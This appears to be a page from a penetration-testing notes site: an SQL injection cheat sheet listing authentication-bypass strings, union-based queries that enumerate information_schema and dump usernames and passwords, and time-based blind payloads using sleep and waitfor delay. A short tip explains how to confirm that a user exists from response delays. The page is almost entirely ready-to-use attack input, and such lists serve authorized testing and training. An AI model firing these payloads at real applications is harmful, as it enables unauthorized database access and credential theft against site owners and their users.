Payloads

or 1=1                
or 1=1-- -
or 1=1-- - //
or 1=1#
or 1=1/
' or 1=1
' or 1=1-- - 
' or 1=1#
' or 1=1/
' or 1=1-- - //
' or 1=1 in (select @@version)-- - //
' or 1=1 in (select * from users)-- -//
' or 1=1 in (select passwords from users)-- -//
' or 1=1 in (select password from users where username = 'admin') -- //

Union based

' order by 1-- -
' order by 1-- //
' union select database(), user(), @@version, null, null -- //    <-- 5 columns
' union select null, table_name, column_name, table_schema, null from information_schema.columns where table_schema=database() --  //
' union select null, username, password, description, null from users -- //

Blind SQLi

1 or sleep(5)#
1 or sleep 5-- - 
1 or sleep 5--
1 or sleep (5-)-
' or sleep(5)-- -
" or sleep(5)="
' or sleep(5)='
'waitfor delay '0:0:5'--
;waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
' AND IF (1=1, sleep(3), 'false') -- -
' AND IF (1=1, sleep(3), 'false') -- //

If the query is looking a specific user we can append the payload and if it hangs for 3 seconds that means that the user exists

adot8' AND IF (1=1, sleep(3), 'false') -- -

Terminators

-- -

PreviousPostgres Cheatsheet NextSQLMap

Last updated 1 year ago